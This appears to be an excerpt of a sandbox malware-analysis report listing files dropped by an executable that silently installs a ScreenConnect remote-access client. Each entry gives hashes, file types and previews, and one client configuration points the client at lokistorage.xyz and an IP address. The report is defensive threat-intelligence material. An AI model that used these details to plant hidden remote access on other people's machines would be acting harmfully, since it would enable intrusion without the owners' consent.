Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) > 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformLicenseXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1768
Entropy (8bit):	5.101132156143849
Encrypted:	false
SSDEEP:	48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
MD5:	258C82001204536C091D6ABF60724339
SHA1:	1C71A8427C60C962D655AD5199F1D68A049EE549
SHA-256:	C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
SHA-512:	3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformOverriddenKeys.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	629
Entropy (8bit):	5.130173870130788
Encrypted:	false
SSDEEP:	12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
MD5:	31908D4B70E384C9F4D42CB05A28A73C
SHA1:	7A69055E9EB8E482C009F12CF5E555585531663B
SHA-256:	3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
SHA-512:	ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
Malicious:	false
Preview:	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()\|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformRoleXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5837
Entropy (8bit):	5.223683802415461
Encrypted:	false
SSDEEP:	48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
MD5:	144ADC93F53E457A1BFFA5372FD3C09B
SHA1:	6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
SHA-256:	D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
SHA-512:	08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
Malicious:	false
Preview:	.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformSecurityEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	741
Entropy (8bit):	5.169072715134804
Encrypted:	false
SSDEEP:	12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
MD5:	41DFF6114A921D7AC5637B8AC9F04DC4
SHA1:	03880D70FA6A268C040025E90BC767D572BA36A0
SHA-256:	2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
SHA-512:	FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformSessionEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
Category:	dropped
Size (bytes):	165735
Entropy (8bit):	4.0957845053651
Encrypted:	false
SSDEEP:	768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
MD5:	4D5B6FB68883C7842D5397D54E85ABC2
SHA1:	02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
SHA-256:	6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
SHA-512:	9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformSessionGroupXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1564
Entropy (8bit):	5.254408929629647
Encrypted:	false
SSDEEP:	24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
MD5:	26E0BFF9194950526A0BA294210BAF79
SHA1:	026D99742D35B1ECCB0DF29ECDA19CECE0387C88
SHA-256:	248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
SHA-512:	A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for sel

C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\TransformWebConfig.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
Category:	dropped
Size (bytes):	42037
Entropy (8bit):	5.478811092639316
Encrypted:	false
SSDEEP:	768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
MD5:	3E2819DAE208FB16B35E83522C9E1E21
SHA1:	325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
SHA-256:	6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
SHA-512:	6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto

C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi

Process:	C:\Users\user\Desktop\H36NgltNe7.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {7A085B4C-0189-0C8C-1652-69D0030FEB14}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	13860864
Entropy (8bit):	7.969006296866273
Encrypted:	false
SSDEEP:	196608:7Zs6Uruc9XbZZs6UYZs6UnZs6UeZs6UvlZs6UvZZs6UvD:7nCtxbZntnEnxn4n2nI
MD5:	46DBB0A30EB3321BF8A0B7B9E8FCF879
SHA1:	E6C532449BA25746B3D5EA548EDCDE831F0F9EED
SHA-256:	8228C46F8277086B960DB842417892BE28DB7ECA1350E019036D9AA92B0B7D5D
SHA-512:	9DB150DE69464AB907EB3D6F6A18ADCF8A37A49BE79B81B15BF5BF03910EFDF05AC71BF21772A0838CCE701A3F8B4709581B451DBD44569CD961B7EA05BAEF6A
Malicious:	false
Preview:	......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\6f5279.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {7A085B4C-0189-0C8C-1652-69D0030FEB14}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	13860864
Entropy (8bit):	7.969006296866273
Encrypted:	false
SSDEEP:	196608:7Zs6Uruc9XbZZs6UYZs6UnZs6UeZs6UvlZs6UvZZs6UvD:7nCtxbZntnEnxn4n2nI
MD5:	46DBB0A30EB3321BF8A0B7B9E8FCF879
SHA1:	E6C532449BA25746B3D5EA548EDCDE831F0F9EED
SHA-256:	8228C46F8277086B960DB842417892BE28DB7ECA1350E019036D9AA92B0B7D5D
SHA-512:	9DB150DE69464AB907EB3D6F6A18ADCF8A37A49BE79B81B15BF5BF03910EFDF05AC71BF21772A0838CCE701A3F8B4709581B451DBD44569CD961B7EA05BAEF6A
Malicious:	false
Preview:	......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\6f527b.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {7A085B4C-0189-0C8C-1652-69D0030FEB14}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	13860864
Entropy (8bit):	7.969006296866273
Encrypted:	false
SSDEEP:	196608:7Zs6Uruc9XbZZs6UYZs6UnZs6UeZs6UvlZs6UvZZs6UvD:7nCtxbZntnEnxn4n2nI
MD5:	46DBB0A30EB3321BF8A0B7B9E8FCF879
SHA1:	E6C532449BA25746B3D5EA548EDCDE831F0F9EED
SHA-256:	8228C46F8277086B960DB842417892BE28DB7ECA1350E019036D9AA92B0B7D5D
SHA-512:	9DB150DE69464AB907EB3D6F6A18ADCF8A37A49BE79B81B15BF5BF03910EFDF05AC71BF21772A0838CCE701A3F8B4709581B451DBD44569CD961B7EA05BAEF6A
Malicious:	false
Preview:	......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI5509.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	423865
Entropy (8bit):	6.57696178053825
Encrypted:	false
SSDEEP:	6144:juH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvh:juH2anwohwQUv5uH2anwohwQUvh
MD5:	86F3320383CDEB908F82CADB6BAA23A1
SHA1:	AA133B3923919FA5F9EB2EAFB7A82758E4F52FC5
SHA-256:	29279D697F640435E9FC5BFFBDF4DFAC3510DF0B0CA099632B5C2F40BD029104
SHA-512:	457BCD1891AB59E7947B4A6AE04C4CAC7AB95EC957A3CFEF3D8A9C50854E55F229B043AA738CD93968C87B0BAADBB16EC9E4B6667B418BBA44CD208227C6627E
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI5509.tmp, Author: Joe Security
Preview:	...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}^.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}f.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}c.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.@.......@.

C:\Windows\Installer\MSI5529.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI576D.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{7A085B4C-0189-0C8C-1652-69D0030FEB14}

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1624744604886434
Encrypted:	false
SSDEEP:	12:JSbX72FjhAGiLIlHVRpMh/7777777777777777777777777vDHFSCP3yMlp3Xl0G:JfQI5cJP1b6F
MD5:	1B89548C87DEFAA90FC74B7A9697928D
SHA1:	C4E7137B76396ED23F98BC2D59E448D78165DA34
SHA-256:	754B36C832C3366B6CD1633D0094547231DC3A07E1045EFC93EDA474A971E223
SHA-512:	CD130AEFC5F5102246C82DB29AFCD7CAD0104283FA299CF3FDD97E53A76B963E0F5928BA5324B7A45742E7AE6F2EFA64EACBEC7A5F3B8BBD1AC0AC54B6E19E44
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.804236085651902
Encrypted:	false
SSDEEP:	48:t8Ph6uRc06WX4IjT5p/94qcq56AdubSiVAld6S2070B3uQca2iQR6YEwg483iFr3:Qh614jTdtpKfVId6l/XtQopAuu
MD5:	77C86B353517D7DA5C354E902EB372C2
SHA1:	10C83F9A8F77CBF6515B839F4D96DD9DFCAEC150
SHA-256:	5D7E3A3DA8954FF1911925EE9D6783D73BC72FF93E3C27ACE9A1533B6CCCA27A
SHA-512:	A681979B897B7315145A6DA48F4CB055F25787057181E3C7400DA9DCAFA1EABD57BF86E6F93D8504354A4715B6EC99B2C3715BFDB79A6CA7A7A123627993DA17
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\{7A085B4C-0189-0C8C-1652-69D0030FEB14}\DefaultIcon

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
Category:	dropped
Size (bytes):	435
Entropy (8bit):	5.289734780210945
Encrypted:	false
SSDEEP:	12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
MD5:	F34D51C3C14D1B4840AE9FF6B70B5D2F
SHA1:	C761D3EF26929F173CEB2F8E01C6748EE2249A8A
SHA-256:	0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
SHA-512:	D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
Malicious:	false
Preview:	..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362967623013811
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpEi
MD5:	87717C3A9A685173382DE0A7ED6E0FED
SHA1:	C38CB86A793516497FCA40363909AF7122F0B9AB
SHA-256:	78C5CDC009425E8C6CB14E3AA0689BCBB9DE1D1303059CB54E4B047AD4EE56EB
SHA-512:	E15D0C9B3D23791CE1B88498F08EA339E348B5B1421D470466F4C7EE89559DA4DD7C2C6691E3A7CAF111409746CE894974A1F829A30FD1802E10A8F2F5B278D8
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\k0xkl0r0.newcfg

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	559
Entropy (8bit):	5.045176629686393
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsQAv/vXbAa3xT:2dL9hK6E46YPpO3vH
MD5:	7AF46EAB522933E5E1520729D07C4BB2
SHA1:	2F00C662DBFC5B812E91ED519549C06CA8B654C4
SHA-256:	48863C6092BC5FFAC80A2B14AB321E4178D07E19B0766641EB623746F2CEE8D0
SHA-512:	D093DE30342199D12158ED7DF2C71F9D9D34DD50052DCFB29028387AA371F8E8EAB23653379408C5BF1A6EEAD4F155635A24A26939265C907822B121F3E5D598
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a25</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\user.config (copy)

Process:	C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.045176629686393
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsQAv/vXbAa3xT:2dL9hK6E46YPpO3vH
MD5:	7AF46EAB522933E5E1520729D07C4BB2
SHA1:	2F00C662DBFC5B812E91ED519549C06CA8B654C4
